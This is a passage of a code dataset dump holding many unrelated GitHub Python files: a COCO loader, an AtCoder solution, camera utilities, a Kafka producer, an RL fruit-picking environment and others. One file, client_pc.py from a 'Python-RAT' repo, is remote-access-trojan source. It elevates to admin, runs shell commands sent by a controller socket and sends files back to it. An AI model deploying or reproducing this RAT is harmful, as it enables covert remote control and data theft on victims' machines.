your own coco-format, dataset, change this to an **empty dict**.\n \"\"\"\n # handle a few special splits whose names do not match the directory names\n _INSTANCE_TO_BASEDIR = {\n \"valminusminival2014\": \"val2014\",\n \"minival2014\": \"val2014\",\n \"val2017_100\": \"val2017\",\n \"unlabeled2017\": \"unlabeled2017\",\n \"train2017.{}@{}-extra\".format(0, 100): \"\",\n \"train2017.{}@{}-extra-unlabeled\".format(0, 100): \"\",\n }\n\n def __init__(self, basedir, split):\n \"\"\"Init.\n\n Args:\n basedir (str): root of the dataset which contains the subdirectories\n for each split and annotations\n split (str): the name of the split, e.g. \"train2017\". The split has\n to match an annotation file in \"annotations/\" and a directory of\n images.\n Examples:\n For a directory of this structure: DIR/ annotations/\n instances_XX.json instances_YY.json XX/ YY/ use\n `COCODetection(DIR, 'XX')` and `COCODetection(DIR, 'YY')`\n \"\"\"\n for sp in SEMI_SUPERVISED_SPLITS:\n if sp not in self._INSTANCE_TO_BASEDIR:\n self._INSTANCE_TO_BASEDIR.update({str(sp): \"train2017\"})\n\n basedir = os.path.expanduser(basedir)\n self._imgdir = os.path.realpath(\n os.path.join(basedir, self._INSTANCE_TO_BASEDIR.get(split, split)))\n assert os.path.isdir(self._imgdir), \"{} is not a directory!\".format(\n self._imgdir)\n if split in SEMI_SUPERVISED_SPLITS:\n annotation_file = os.path.join(\n basedir,\n \"annotations/semi_supervised/instances_{}.json\".format(split))\n else:\n annotation_file = os.path.join(\n basedir, \"annotations/instances_{}.json\".format(split))\n assert os.path.isfile(annotation_file), annotation_file\n\n self.coco = COCO(annotation_file)\n self.annotation_file = annotation_file\n logger.info(\"Instances loaded from {}.\".format(annotation_file))\n\n def eval_inference_results2(self,\n results,\n output=None,\n threshold=None,\n metric_only=False):\n # Compared with eval_inference_results, v2 version has an threshold\n # used to filter scores below. 
It is designed for SSL experiments.\n if not metric_only:\n if threshold is not None:\n logger.warn(\n \"Use thresholding {} to filter final resulting boxes\".format(\n threshold))\n continuous_id_to_COCO_id = {\n v: k for k, v in self.COCO_id_to_category_id.items()\n }\n n = 0\n final_results = []\n for res in results:\n # convert to COCO's incontinuous category id\n if res[\"category_id\"] in continuous_id_to_COCO_id:\n res[\"category_id\"] = continuous_id_to_COCO_id[res[\"category_id\"]]\n\n if threshold is not None:\n if res[\"score\"] < threshold:\n n += 1\n continue\n # COCO expects results in xywh format\n box = res[\"bbox\"]\n box[2] -= box[0]\n box[3] -= box[1]\n res[\"bbox\"] = [round(float(x), 3) for x in box]\n final_results.append(res)\n\n results = final_results\n if output is not None:\n if not os.path.exists(os.path.dirname(output)):\n os.makedirs(os.path.dirname(output))\n with open(output, \"w\") as f:\n json.dump(results, f)\n if threshold is not None:\n with open(output + \"_boxcount.json\", \"w\") as f:\n r = {\"passed\": len(results), \"removed\": n}\n print(\"Box thresholding stats: \\n\\t\", r)\n json.dump(r, f)\n\n if len(results):\n metrics = self.print_coco_metrics(results)\n # save precision_recall data:\n precision_recall = self.cocoEval.precision_recall\n pr_path = os.path.join(os.path.split(output)[0], \"precision_recall.npy\")\n print(\"Saving precision_recall curve to {}\".format(pr_path))\n np.save(pr_path, {\"pr\": precision_recall})\n # sometimes may crash if the results are empty?\n return metrics\n else:\n return {}\n\n\ndef register_coco(basedir):\n \"\"\"Register COCO.\n\n Add COCO datasets like \"coco_train201x\" to the registry,\n so you can refer to them with names in `cfg.DATA.TRAIN/VAL`.\n\n Note that train2017==trainval35k==train2014+val2014-minival2014, and\n val2017==minival2014.\n\n Args:\n basedir: root dir that saves datasets.\n \"\"\"\n\n # 80 names for COCO\n # For your own coco-format dataset, change this.\n class_names = [\n \"person\", \"bicycle\", \"car\", \"motorcycle\", \"airplane\", \"bus\", \"train\",\n \"truck\", \"boat\", \"traffic light\", \"fire hydrant\", \"stop sign\",\n \"parking meter\", \"bench\", \"bird\", \"cat\", \"dog\", \"horse\", \"sheep\", \"cow\",\n \"elephant\", \"bear\", \"zebra\", \"giraffe\", \"backpack\", \"umbrella\", \"handbag\",\n \"tie\", \"suitcase\", \"frisbee\", \"skis\", \"snowboard\", \"sports ball\", \"kite\",\n \"baseball bat\", \"baseball glove\", \"skateboard\", \"surfboard\",\n \"tennis racket\", \"bottle\", \"wine glass\", \"cup\", \"fork\", \"knife\", \"spoon\",\n \"bowl\", \"banana\", \"apple\", \"sandwich\", \"orange\", \"broccoli\", \"carrot\",\n \"hot dog\", \"pizza\", \"donut\", \"cake\", \"chair\", \"couch\", \"potted plant\",\n \"bed\", \"dining table\", \"toilet\", \"tv\", \"laptop\", \"mouse\", \"remote\",\n \"keyboard\", \"cell phone\", \"microwave\", \"oven\", \"toaster\", \"sink\",\n \"refrigerator\", \"book\", \"clock\", \"vase\", \"scissors\", \"teddy bear\",\n \"hair drier\", \"toothbrush\"\n ] # noqa\n class_names = [\"BG\"] + class_names\n register_coco_supervised(basedir)\n\n for split in SEMI_SUPERVISED_SPLITS[:-NUM_20CLASS]:\n name = \"coco_\" + split\n DatasetRegistry.register(name, lambda x=split: COCODetection(basedir, x))\n DatasetRegistry.register_metadata(name, \"class_names\", class_names)\n\n logger.info(\"Register dataset {}\".format(\n [a for a in DatasetRegistry._registry.keys()])) # pylint: disable=protected-access\n\n assert os.environ[\"COCODIR\"], \"COCODIR 
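# --- [Editor's aside, not part of the original record] ---------------------
# The in-place box edit in eval_inference_results2 above converts corner
# coordinates (x1, y1, x2, y2) to COCO's expected (x, y, width, height):
box = [10.0, 20.0, 50.0, 80.0]        # x1, y1, x2, y2
box[2] -= box[0]                      # width  = x2 - x1
box[3] -= box[1]                      # height = y2 - y1
assert box == [10.0, 20.0, 40.0, 60.0]
# ---------------------------------------------------------------------------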
environ variable is not set\".format(\n os.environ[\"COCODIR\"])\n # also register coco train set 20 class for voc experiments\n register_coco_for_voc(os.environ[\"COCODIR\"])\n\n\nclass COCODetectionForVOC(COCODetection):\n \"\"\"COCODetection for VOC.\"\"\"\n # set to empty since this instances_unlabeledtrainval20class.json file has file_name with relative path to train2017 or val2017\n _INSTANCE_TO_BASEDIR = {\"unlabeledtrainval20class\": \"\"}\n # this mapping is obtained by running dataset/cls_mapping_coco_voc.py\n COCO_id_to_category_id = {\n 64: 14,\n 1: 3,\n 2: 6,\n 3: 10,\n 4: 1,\n 5: 16,\n 6: 18,\n 7: 9,\n 72: 20,\n 9: 8,\n 67: 19,\n 44: 17,\n 16: 11,\n 17: 12,\n 18: 2,\n 19: 4,\n 20: 15,\n 21: 7,\n 62: 13,\n 63: 5\n }\n\n\ndef register_coco_for_voc(basedir):\n class_names = [\n \"person\", \"chair\", \"aeroplane\", \"bus\", \"cow\", \"bird\", \"motorbike\", \"boat\",\n \"car\", \"horse\", \"sofa\", \"pottedplant\", \"tvmonitor\", \"cat\", \"train\",\n \"bottle\", \"diningtable\", \"dog\", \"bicycle\", \"sheep\"\n ]\n class_names = [\"BG\"] + class_names\n for split in SEMI_SUPERVISED_SPLITS[-NUM_20CLASS:]:\n name = \"coco_\" + split\n DatasetRegistry.register(\n name, lambda x=split: COCODetectionForVOC(basedir, x))\n DatasetRegistry.register_metadata(name, \"class_names\", class_names)\n\n logger.info(\"Register dataset {}\".format(\n [a for a in DatasetRegistry._registry.keys()]))\n\n\nif __name__ == \"__main__\":\n basedir = \"<add-data-path>\"\n c = COCODetection(basedir, \"train2017\")\n roidb = c.load(add_gt=True, add_mask=True)\n print(\"#Images:\", len(roidb))\n","repo_name":"google-research/ssl_detection","sub_path":"detection/dataset/coco.py","file_name":"coco.py","file_ext":"py","file_size_in_byte":8897,"program_lang":"python","lang":"en","doc_type":"code","stars":389,"dataset":"github-code","pt":"72"} +{"seq_id":"23077522574","text":"from collections import deque\nINF = float('inf')\nN, u, v = map(int, input().split())\nu -= 1\nv -= 1\nG = [[] for _ in range(N)]\nfor _ in range(N - 1):\n A, B = map(lambda x: int(x) - 1, input().split())\n G[A].append(B)\n G[B].append(A)\n\n\ndef bfs(s):\n d = [INF] * N\n d[s] = 0\n q = deque([s])\n while len(q):\n u = q.popleft()\n for v in G[u]:\n if d[v] > d[u] + 1:\n d[v] = d[u] + 1\n q.append(v)\n return d\n\n\nd1 = bfs(u)\nd2 = bfs(v)\nres = max(x2 for x1, x2 in zip(d1, d2) if x1 < x2) - 1\nlst = [x2 for x1, x2 in zip(d1, d2) if x1 == x2]\nif len(lst) and min(lst) > res:\n res = min(lst)\nprint(res)\n","repo_name":"e5pe0n/algorithm-training","sub_path":"AtCoder/ABC/148/python/F_Playing_Tag_on_Tree.py","file_name":"F_Playing_Tag_on_Tree.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19426312948","text":"import cv2\n\n\nclass CamIO:\n capture = None\n mainq = None\n clientqs = []\n\n def __init__(self, resolution, port, saturation, clientlist):\n res = resolution.split('x')\n self.capture = cv2.VideoCapture(port)\n self.capture.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, float(res[0]))\n self.capture.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, float(res[1]))\n self.capture.set(cv2.cv.CV_CAP_PROP_SATURATION, float(saturation))\n self.mainq = clientlist\n\n def getimage(self):\n return cv2.GaussianBlur(self.capture.read()[1], (5, 5), 0)\n\n @staticmethod\n def writeimg(path, img):\n cv2.imwrite(path, img)\n\n @staticmethod\n def togray(img):\n return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n @staticmethod\n def torgb(img):\n return 
cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n @staticmethod\n def diffimg(t_minus, t, t_plus):\n t_minus = cv2.cvtColor(t_minus, cv2.COLOR_BGR2GRAY)\n t = cv2.cvtColor(t, cv2.COLOR_BGR2GRAY)\n t_plus = cv2.cvtColor(t_plus, cv2.COLOR_BGR2GRAY)\n d1 = cv2.absdiff(t_plus, t)\n d2 = cv2.absdiff(t, t_minus)\n return cv2.bitwise_and(d1, d2)\n\n @staticmethod\n def getvalidpixels(img):\n return cv2.countNonZero(img)\n\n @staticmethod\n def camavailable(port):\n try:\n cap = cv2.VideoCapture(port)\n img = cap.read()[1]\n cap.release()\n except:\n return False\n return True\n\n def startloop(self):\n while True:\n if not self.mainq.empty():\n self.clientqs = self.mainq.get()\n\n img1 = self.capture.read()[1]\n img2 = self.capture.read()[1]\n img3 = self.capture.read()[1]\n for clientq in self.clientqs:\n if not clientq.empty():\n clientq.put(img1)\n clientq.put(img2)\n clientq.put(img3)","repo_name":"trevtb/desccunit","sub_path":"camhelper.py","file_name":"camhelper.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42093643767","text":"import time\nimport datetime\nfrom kafka import KafkaProducer\n\nproducer = KafkaProducer(bootstrap_servers = 'kafka:9092')\n\nwhile True:\n current_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n message = \"Current time is \" + str(current_time)\n producer.send('common', message.encode('utf-8'))\n print(f\"Message sent: {message}\")\n time.sleep(5)","repo_name":"pasha-str27/NUWM_Labs","sub_path":"Lab_05/service1/service1.py","file_name":"service1.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23822566681","text":"# client_pc.py\r\n\r\nimport socket\r\nimport subprocess\r\nimport time\r\nimport os\r\nimport shutil\r\nimport pyuac\r\n\r\n\r\ndef main():\r\n host = \"127.0.0.1\"\r\n port = 4886\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n def common():\r\n op = subprocess.Popen(data.decode(), shell=True,\r\n stdout=subprocess.PIPE,\r\n stderr=subprocess.PIPE,\r\n stdin=subprocess.PIPE, )\r\n\r\n report = op.stdout.read()\r\n report_error = op.stderr.read()\r\n\r\n print(report.decode())\r\n print(report_error.decode())\r\n\r\n s.sendall(report)\r\n s.sendall(report_error)\r\n\r\n while True:\r\n try:\r\n s.connect((host, port))\r\n print(\"Established connection to: \", str(host) + \":\" + str(port))\r\n break\r\n except Exception:\r\n print(\"Connection refused, retrying...\")\r\n time.sleep(2)\r\n\r\n while True:\r\n data = s.recv(4294967296)\r\n extracted = data.decode()\r\n print(\"Executed:\", extracted)\r\n\r\n if extracted[:2] == \"cd\":\r\n try:\r\n os.chdir(extracted[3:])\r\n s.sendall((\"Directory changed: \" + extracted).encode())\r\n except Exception:\r\n print(\"The system cannot find the path specified.\")\r\n s.sendall(\"The system cannot find the path specified.\".encode())\r\n\r\n elif extracted[:5] == \"mkdir\":\r\n try:\r\n os.mkdir(extracted[6:])\r\n s.sendall((\"Directory made: \" + extracted).encode())\r\n except Exception:\r\n print(\"A subdirectory or file \" + extracted[6:] + \" already exists.\")\r\n s.sendall(\"A subdirectory or file \" + extracted[6:] + \" already exists.\")\r\n\r\n elif extracted[:6] == \"deldir\":\r\n try:\r\n shutil.rmtree(extracted[7:])\r\n s.sendall((\"Directory deleted: \" + extracted).encode())\r\n except Exception:\r\n print(\"The system cannot find the subdirectory 
specified.\")\r\n s.sendall(\"The system cannot find the subdirectory specified.\")\r\n \r\n elif extracted[:8] == \"download\":\r\n try:\r\n f = open(extracted[9:], \"rb\")\r\n data = f.read()\r\n print(\"File uploaded.\")\r\n s.sendall(data)\r\n f.close()\r\n except:\r\n print(\"Unable to send data.\")\r\n s.sendall(\"Unable to send data.\".encode())\r\n\r\n else:\r\n common()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n if not pyuac.isUserAdmin():\r\n pyuac.runAsAdmin()\r\n else:\r\n main()\r\n","repo_name":"WilliamAfton-codes/Python-RAT","sub_path":"client_pc.py","file_name":"client_pc.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20216944297","text":"#!/usr/bin/python3\n\n\nif __name__ == \"__main__\":\n from calculator_1 import add, div, sub, mul\n import sys\n\n def checkForOperator(op):\n ar = [\"+\", \"-\", \"/\", \"*\"]\n operation = [add, sub, div, mul]\n if (op in ar):\n for i in range(0, len(ar)):\n if (op == ar[i]):\n return operation[i]\n\n else:\n return 0\n\n args = sys.argv\n length = len(args)\n\n if (length - 1 != 3):\n print(\"Usage: ./100-my_calculator.py <a> <operator> <b>\")\n exit(1)\n else:\n operation = checkForOperator(args[2])\n if (operation == 0):\n print(\"Unknown operator. Available operators: +, -, * and /\")\n exit(1)\n else:\n ar1 = int(args[1])\n ar2 = int(args[3])\n print(\"{} {} {} = {}\".format(\n ar1, args[2], ar2, operation(ar1, ar2)))\n","repo_name":"salahbesbes/holbertonschool-higher_level_programming","sub_path":"0x02-python-import_modules/100-my_calculator.py","file_name":"100-my_calculator.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28407695887","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\ndf = pd.read_csv('C:\\\\Users\\\\DIOGO MOTA\\\\Desktop\\\\Codigo_Estagio\\\\DADOS\\\\Dados_Ze\\\\Mao_esquerda_ze\\\\ze_esquerda.csv')\r\n\r\ndf = pd.DataFrame(df, columns = ['frames', 'x', 'y', 'dr'])\r\ndf.drop([0])\r\n\r\nx = df['x'].tolist()\r\ny = df['y'].tolist()\r\n\r\ndef norm_pos(lista_x, lista_y):\r\n\r\n lista_norm_x = []\r\n lista_norm_y = []\r\n media_x = np.mean(lista_x)\r\n media_y = np.mean(lista_y)\r\n desvio_padrao_x = np.std(lista_x)\r\n desvio_padrao_y = np.std(lista_y)\r\n\r\n for i in range(len(lista_x)):\r\n\r\n x_novo = (lista_x[i] - media_x) / desvio_padrao_x\r\n y_novo = (lista_y[i] - media_y) / desvio_padrao_y\r\n lista_norm_x.append(x_novo)\r\n lista_norm_y.append(y_novo)\r\n\r\n\r\n\r\n return(lista_norm_x, lista_norm_y)\r\n\r\nnormalizacao = norm_pos(x,y)\r\n\r\nnorm_x = normalizacao[0]\r\nnorm_y = normalizacao[1]\r\n\r\ndados = {'x': norm_x, 'y': norm_y}\r\nbase = pd.DataFrame(dados)\r\n\r\nbase.to_csv('C:\\\\Users\\\\DIOGO MOTA\\\\Desktop\\\\Codigo_Estagio\\\\DADOS\\\\Dados_Ze\\\\Mao_esquerda_ze\\\\ze_esquerda_posicoes_norm.txt')\r\n","repo_name":"Dpm99/Video-Analysis-for-pattern-recognition","sub_path":"Normalize_positions.py","file_name":"Normalize_positions.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21063885508","text":"import logging\nimport os\nimport sys\nimport cv2\nimport time\nfrom datetime import datetime\nimport threading\n\n# Test periodical image capture with\n# RPi Camera Module v2, resolution 3280 x 2464 pixels\n\ndef is_number(s):\n try:\n 
float(s)\n        return True\n    except ValueError:\n        return False\n\nclass CameraRPiv2(): # cap_w=3280, cap_h=2464\n    capture_width = 3280\n    capture_height = 2464\n    fps = 21\n    width = 3280 # // 2\n    height = 2464 # // 2\n    \n    def __init__(self, *args, **kwargs):\n        # super(CameraRPiv2, self).__init__(*args, **kwargs)\n        # self.value = np.empty((self.height, self.width, 3), dtype=np.uint8)\n        try:\n            self.cap = cv2.VideoCapture(self._gst_str(), cv2.CAP_GSTREAMER)\n            re, image = self.cap.read()\n            if not re:\n                raise RuntimeError('Could not read image from camera.')\n            self.value = image\n            self.start()\n        except Exception:  # avoid a bare except so KeyboardInterrupt still propagates\n            self.stop()\n            raise RuntimeError('Could not initialize camera')\n        # atexit.register(self.stop)\n\n    def _gst_str(self):\n        return 'nvarguscamerasrc ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink' % (\n            self.capture_width, self.capture_height, self.fps, self.width, self.height)\n    \n    def _capture_frames(self):\n        while True:\n            re, image = self.cap.read()\n            if re:\n                self.value = image\n            else:\n                break\n\n    def start(self):\n        if not self.cap.isOpened():\n            self.cap.open(self._gst_str(), cv2.CAP_GSTREAMER)\n        if not hasattr(self, 'thread') or not self.thread.is_alive():  # Thread.isAlive() was removed in Python 3.9\n            self.thread = threading.Thread(target=self._capture_frames)\n            self.thread.start()\n\n    def stop(self):\n        if hasattr(self, 'cap'):\n            self.cap.release()\n        if hasattr(self, 'thread'):\n            self.thread.join()\n    \n    def restart(self):\n        self.stop()\n        self.start()\n\n\nif __name__ == \"__main__\":\n    \n    d_name = os.path.abspath(os.path.dirname(__file__))\n    f_name = os.path.splitext(os.path.basename(__file__))[0]\n\n    logging.basicConfig(\n        level=logging.DEBUG, \n        filename=os.path.join(d_name, f_name + \".log\"),\n        filemode=\"w\",\n        format=\"%(asctime)s: %(levelname)s: %(funcName)s Line:%(lineno)d %(message)s\",\n        datefmt=\"%d/%m/%Y %H:%M:%S\")\n\n    logging.info(\"Starting camera test\")\n\n    secs = 0.5\n    if len(sys.argv) == 2 and is_number(sys.argv[1]): # value.isdigit()\n        secs = float(sys.argv[1])\n        logging.info(\"Set period to {} second(s)\".format(secs))\n    else:\n        print(\"Test whether camera is periodically capturing images\")\n        print(\"Usage: python3 \" + __file__ + \" nsec\")\n        sys.exit()\n\n    d_out = os.path.join(d_name, f_name)\n    \n    if not os.path.exists(d_out):\n        logging.info(\"Make output directory {}\".format(d_out))\n        os.makedirs(d_out)\n    \n    cam = CameraRPiv2()\n\n    try:\n        while True:\n            # img_path = os.path.join(d_out_0, datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\") + '.jpg')\n            # img_path = os.path.join(d_out, 'frame_'+ datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\") +'.jpg')\n            img_path = os.path.join(d_out, datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\") +'.jpg')\n            logging.info(\"Capture camera value and write to {}\".format(img_path))\n            cv2.imwrite(img_path, cam.value)\n            print(img_path)\n            # <class 'numpy.ndarray'> (2464, 3280, 3)\n            time.sleep(secs)\n    except KeyboardInterrupt:\n        logging.info(\"Keyboard interrupt\")\n        cam.stop()","repo_name":"miroslavradojevic/python-snippets","sub_path":"jetbot/cam_rpiv2.py","file_name":"cam_rpiv2.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"20195919436","text":"#!/usr/bin/env python3\n\nimport unittest\nimport varapp\nfrom varapp.apps import VarappConfig\nfrom django.db import connections\nimport django.test\n\nclass TestStartup(django.test.TestCase):\n    
\"\"\"What happens when the app starts\"\"\"\n def test_normal(self):\n conf = VarappConfig('varapp', varapp)\n return_code = conf.ready()\n self.assertEqual(return_code, 0)\n\n def test_no_tables_in_users_db(self):\n c = connections['default'].cursor()\n c.execute(\"PRAGMA writable_schema = 1\")\n c.execute(\"delete from sqlite_master where type='table'\")\n c.execute(\"PRAGMA writable_schema = 0\")\n conf = VarappConfig('varapp', varapp)\n return_code = conf.ready()\n self.assertEqual(return_code, 1)\n\n @unittest.skip('')\n def test_no_redis(self):\n pass\n","repo_name":"varapp/varapp-backend-py","sub_path":"tests/test_startup.py","file_name":"test_startup.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"1950254686","text":"# Write a program to check character is vowel or not.\n\nvowels = ['a', 'e', 'i', 'o', 'u']\n\na = input(\"Enter a character: \")\nb = a.lower() in vowels\nif b:\n print(\"Vowel\")\nelse:\n print(\"Not a vowel\")","repo_name":"basu021/lab","sub_path":"5th_sem/python/record-written/vowel.py","file_name":"vowel.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"35271080248","text":"import numpy as np\nfrom .env import Env\nfrom ..constants import Constants\n\n\nclass Fruits(Env):\n\n WRONG_PICK_REWARD = - 0.1\n STEP_REWARD = 0.0\n POSITIVE_REWARD = 1.0\n\n class Fruit:\n\n def __init__(self, index, position, env_size):\n # fruit has an index, a position and an indicator if it was picked (active)\n self.index = index\n self.position = position\n self.active = False\n\n self.x = self.position // env_size\n self.y = self.position % env_size\n\n def same_position(self, fruit):\n\n return self.position == fruit.position\n\n def __str__(self):\n\n s = \"Fruit {:d}: position ({:d},{:d})/{:d}, \".format(self.index, self.x, self.y, self.position)\n\n if self.active:\n s += \"active\"\n else:\n s += \"inactive\"\n\n return s\n\n def __init__(self, num_fruits=5, size=5, max_steps=30, no_start=True, no_wrong_pick=True):\n # no_start should be True\n # it's from an old version where the agent needed to execute action 0 in order to start picking\n super(Fruits, self).__init__()\n\n self.num_fruits = num_fruits\n self.size = size\n self.max_steps = max_steps\n self.no_start = no_start\n self.no_wrong_pick = no_wrong_pick\n\n self.goal = None\n self.fruits = []\n self.started = None\n self.current_step = None\n\n self.reset_goal()\n self.reset()\n\n def reset(self):\n # reset fruits\n self.fruits = []\n self.started = False\n self.current_step = 0\n\n if self.no_start:\n self.started = True\n\n for i in range(self.num_fruits):\n\n while True:\n\n fruit = self.create_fruit_(i)\n\n done = True\n for fruit2 in self.fruits:\n if fruit.same_position(fruit2):\n done = False\n\n if done:\n break\n\n self.fruits.append(fruit)\n\n return self.get_state()\n\n def reset_goal(self):\n # sample a random goal (a set of fruits to pick up)\n # self.goal is a list of indices of the goal fruits\n num_fruits = np.random.randint(1, self.num_fruits + 1)\n fruits = list(np.random.choice(list(range(self.num_fruits)), size=num_fruits, replace=False))\n\n self.goal = fruits\n\n def step(self, action):\n # execute a step in the env given an action\n num_actions = self.size ** 2\n assert 0 <= action < num_actions\n reached_goal = False\n done = False\n negative_reward = False\n\n if action == 0 and not 
self.no_start:\n # old version of the env had action 0 = start picking\n # now self.no_start should be always true\n self.started = True\n elif action == num_actions - 1:\n # action 24 (last action) is for saying that you are done picking\n reached_goal = self.check_goal_()\n else:\n # started should be always true\n if self.started:\n for fruit in self.fruits:\n if fruit.position == action:\n if self.no_wrong_pick:\n # no wrong pick means that the agent gets penalized for picking the wrong fruit\n # I use this in my paper\n if fruit.index in self.goal:\n fruit.active = True\n else:\n negative_reward = True\n else:\n fruit.active = not fruit.active\n\n self.current_step += 1\n\n if self.current_step >= self.max_steps or reached_goal:\n # we are done if we reached step limit or we picked up the right fruits and executed the end action\n done = True\n\n reward = self.STEP_REWARD\n\n if negative_reward:\n reward = self.WRONG_PICK_REWARD\n if reached_goal:\n reward = self.POSITIVE_REWARD\n\n return self.get_state(), reward, done, {Constants.REACHED_GOAL: reached_goal}\n\n def get_state(self):\n # get state as a tensor of HxWx|F|\n # H: height, W: width, |F|: number of fruits\n # the last dimension is used to one-hot encode fruits\n # zero everywhere means no fruit at that position\n image = np.zeros((self.size, self.size, self.num_fruits + 1), dtype=np.float32)\n\n if self.started and not self.no_start:\n # agent pressed the start flag\n image[0, 0, self.num_fruits] = 1.0\n\n for fruit in self.fruits:\n # mark the fruit location with 1\n image[fruit.x, fruit.y, fruit.index] = 1.0\n if fruit.active:\n # make if a fruit has been picked\n image[fruit.x, fruit.y, self.num_fruits] = 1.0\n\n return image\n\n def get_abstract_action(self, action):\n # used for debugging\n num_actions = self.size ** 2\n offset = 0\n\n if not self.started:\n if action == 0:\n return offset\n else:\n return offset + 1\n else:\n offset += 2\n if action == 0:\n return offset\n elif action == num_actions - 1:\n offset += 1\n if self.check_goal_():\n return offset\n else:\n return offset + 1\n else:\n offset += 3\n for fruit in self.fruits:\n if action == fruit.position:\n if fruit.active:\n if fruit.index in self.goal:\n return offset\n else:\n return offset + 1\n else:\n if fruit.index in self.goal:\n return offset + 2\n else:\n return offset + 3\n\n offset += 4\n return offset\n\n def get_abstract_action_name(self, abstract_action):\n # used for debugging\n names = [\n \"start\", \"start not active\", \"start already active\", \"finish\", \"not yet done\", \"deactivate goal fruit\",\n \"deactivate distractor fruit\", \"activate goal fruit\", \"activate distractor fruit\", \"do nothing\"\n ]\n\n return names[abstract_action]\n\n def check_goal_(self):\n # check if goal reached\n if not self.started:\n return False\n\n for fruit in self.fruits:\n if fruit.active and fruit.index not in self.goal:\n return False\n if not fruit.active and fruit.index in self.goal:\n return False\n\n return True\n\n def create_fruit_(self, index):\n # create a fruit at a random position\n # fruit index is also its position in self.fruits, bit redundant\n num_cells = self.size ** 2\n\n if self.no_start:\n start_idx = 0\n else:\n start_idx = 1\n\n position = int(np.random.randint(start_idx, num_cells - 1))\n\n return self.Fruit(index, position, self.size)\n\n def get_next_fruit_to_pick_(self):\n # hand-crafted optimal policy, used to generate expert demonstrations\n for fruit_idx in self.goal:\n\n fruit = self.fruits[fruit_idx]\n\n if not 
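# --- [Editor's aside, not part of the original record] ---------------------
# The HxWx(|F|+1) state built by get_state() above, reduced to its essence;
# grid size, fruit count and coordinates are toy assumptions:
import numpy as np
size, num_fruits = 5, 5
image = np.zeros((size, size, num_fruits + 1), dtype=np.float32)
x, y, index = 2, 3, 0
image[x, y, index] = 1.0         # one-hot channel: fruit `index` at (x, y)
image[x, y, num_fruits] = 1.0    # last channel marks the fruit as picked
# ---------------------------------------------------------------------------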
fruit.active:\n # goal fruit not picked\n return fruit_idx\n\n # already picked all fruits\n return None\n\n def get_optimal_action_(self):\n # hand-crafted optimal policy, used to generate expert demonstrations\n assert self.no_start\n\n if self.check_goal_():\n # \"end\" action\n return int(self.size ** 2) - 1\n else:\n next_fruit_idx = self.get_next_fruit_to_pick_()\n return self.fruits[next_fruit_idx].position\n\n @staticmethod\n def state_to_image(state):\n # turn state into an RGB image, doesn't show the fruit indices\n r = np.sum(state[:, :, :-1], axis=2)\n g = state[:, :, -1]\n b = np.zeros_like(g)\n\n return np.stack([r, g, b], axis=2)\n","repo_name":"ondrejbiza/action_priors","sub_path":"ap/envs/fruits.py","file_name":"fruits.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"24766046425","text":"import torch\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nimport cv2 as cv\nimport model\nimport pickle\n\nDATA_MAX_SIZE = 1000\n\nFILE = \"dataset/input\"\nmdl_file = \"model/UNet_mdl5.pickle\"\n\n# if torch.cuda.is_available():\n# device = torch.device(\"cuda:0\")\n# print(\"Running on GPU\")\n# else:\n# device = torch.device(\"cpu\")\n# print(\"Running on CPU\")\ndevice = torch.device(\"cpu\")\nfiles =[]\n\nif os.path.isdir(FILE):\n for fi in os.listdir(FILE):\n files.append(os.path.join(FILE, fi))\nelse:\n files.append(FILE)\n\n# net = model.UNet()\nfile = open(mdl_file, \"rb\")\nnet = pickle.load(file)\nfile.close()\nnet.to(device)\n\nfor f_img in files[DATA_MAX_SIZE:DATA_MAX_SIZE*2]:\n with torch.no_grad():\n img = cv.imread(f_img, cv.IMREAD_GRAYSCALE)\n cv.imshow(\"INPUT\", img)\n img = torch.Tensor([np.array((img))]).view(-1, 1, net.INPUT_SIZE, net.INPUT_SIZE)\n img = img / 255\n img = img.to(device)\n out = net(img)\n out = out.to('cpu')\n out = out.view(net.OUTPUT_SIZE, net.OUTPUT_SIZE).numpy()\n cv.imshow(\"OUTPUT\", out)\n cv.waitKey(500)\n","repo_name":"kamilmlodzikowski/UNet_filter","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6591303526","text":"import numpy as np\nimport qtpy\nimport 